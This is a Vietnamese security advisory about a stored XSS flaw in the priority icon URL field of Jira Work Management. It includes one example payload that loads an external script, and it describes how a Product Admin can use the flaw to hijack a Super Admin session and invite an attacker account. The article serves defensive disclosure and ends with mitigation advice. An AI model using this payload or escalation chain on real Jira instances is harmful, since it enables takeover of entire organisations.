Các nhà nghiên cứu bảo mật tại Snapsec vừa công bố chi tiết về một lỗ hổng bảo mật nghiêm trọng được gọi tên là Stored Cross-Site Scripting trong Jira Work Management – công cụ quản lý tác vụ và dự án hàng đầu của Atlassian.

Dù được thiết kế để vận hành trong một hệ sinh thái bảo mật chặt chẽ, việc thiếu sót trong kiểm tra dữ liệu đầu vào tại các bảng cấu hình nội bộ đã biến một tính năng tùy chỉnh mức độ ưu tiên thành công cụ để các tin tặc thực hiện cuộc tấn công chiếm quyền điều khiển toàn bộ tổ chức chỉ bằng cách thao túng các trường cấu hình thông thường.

Đi sâu vào kỹ thuật: Lỗ hổng Stored XSS qua thuộc tính Icon URL

Phân tích từ Snapsec cho thấy rủi ro nằm ở cách Jira xử lý các trường dữ liệu tùy chỉnh trong quy trình làm việc:

  • Lỗ hổng tại trường cấu hình: Trong Jira, quản trị viên có quyền tạo các mức độ ưu tiên (priority) mới cho các “issue”. Mỗi mức độ ưu tiên này đi kèm với một thuộc tính gọi là “icon URL”.
  • Thiếu hụt cơ chế bảo vệ: Hệ thống backend của Jira đã không thực hiện đầy đủ các bước kiểm tra dữ liệu đầu vào (input validation)mã hóa đầu ra (output encoding) cho trường URL này.
  • Véc-tơ tấn công: Tin tặc có thể chèn một chuỗi mã độc (payload) vào trường icon URL thay vì một liên kết hình ảnh hợp lệ. Ví dụ:
    https://google.com?name=</script><script src=https://snapsec.co/jira-xss.js></script>
  • Cơ chế thực thi: Vì đây là lỗi Stored XSS (XSS lưu trữ), đoạn mã độc sẽ được lưu vĩnh viễn trên máy chủ của Jira. Bất kỳ người dùng nào truy cập vào trang quản lý hoặc xem các issue có chứa mức độ ưu tiên này sẽ bị thực thi mã độc ngay lập tức trong trình duyệt mà không cần nhấp vào bất kỳ liên kết lạ nào.

Thực thi chiếm quyền điều khiển tổ chức

Điểm đáng chú ý của lỗ hổng này không chỉ nằm ở kỹ thuật XSS mà còn ở cách tin tặc leo thang đặc quyền từ một người dùng bình thường lên cấp quản trị cao nhất:

  1. Sử dụng tài khoản Product Admin: Nhóm nghiên cứu xác định rằng vai trò Product Admin – dù có quyền hạn hạn chế và không thể truy cập các sản phẩm khác như Confluence – vẫn có đủ quyền để chỉnh sửa mức độ ưu tiên của issue.
  2. Bẫy Super Admin: Tin tặc sử dụng quyền Product Admin để chèn payload độc hại. Khi một Super Admin vô tình truy cập trang cấu hình để kiểm tra hoặc chỉnh sửa, mã độc sẽ chạy dưới danh nghĩa phiên làm việc của Super Admin đó.
  3. Mời tự động và Chiếm quyền: Đoạn mã JavaScript độc hại sẽ tự động gửi một yêu cầu mời từ tài khoản Super Admin. Yêu cầu này sẽ thêm một tài khoản mới do kẻ tấn công kiểm soát vào tổ chức với quyền truy cập đầy đủ.
  4. Hệ quả: Kẻ tấn công có thể xem, sửa đổi hoặc xóa bỏ bất kỳ dự án, dữ liệu nào trên toàn bộ môi trường Atlassian của doanh nghiệp.

Khuyến cáo từ chuyên gia của VNCS Global

Để bảo vệ tổ chức trước các lỗ hổng XSS lưu trữ và nguy cơ chiếm quyền điều khiển tài khoản đặc quyền, VNCS Global khuyến nghị các doanh nghiệp thực hiện:

  • Cập nhật bản vá ngay lập tức: Thường xuyên kiểm tra và cập nhật các bản vá bảo mật mới nhất từ Atlassian cho Jira và các sản phẩm liên quan.
  • Rà soát cấu hình: Đội ngũ bảo mật cần kiểm tra lại các cấu hình mức độ ưu tiên, trạng thái issue và các trường URL tùy chỉnh để đảm bảo không chứa các ký tự lạ hoặc mã script.
  • Giám sát quyền quản trị cấp cao: Sử dụng các công cụ giám sát để phát hiện các hoạt động bất thường từ tài khoản Super Admin, đặc biệt là các hành động mời người dùng mới hoặc thay đổi quyền hạn hàng loạt.
  • Áp dụng Zero Trust: Không tin tưởng bất kỳ đầu vào dữ liệu nào, kể cả từ các giao diện quản trị nội bộ. Thực hiện encode dữ liệu đầu ra triệt để trên mọi thành phần giao diện.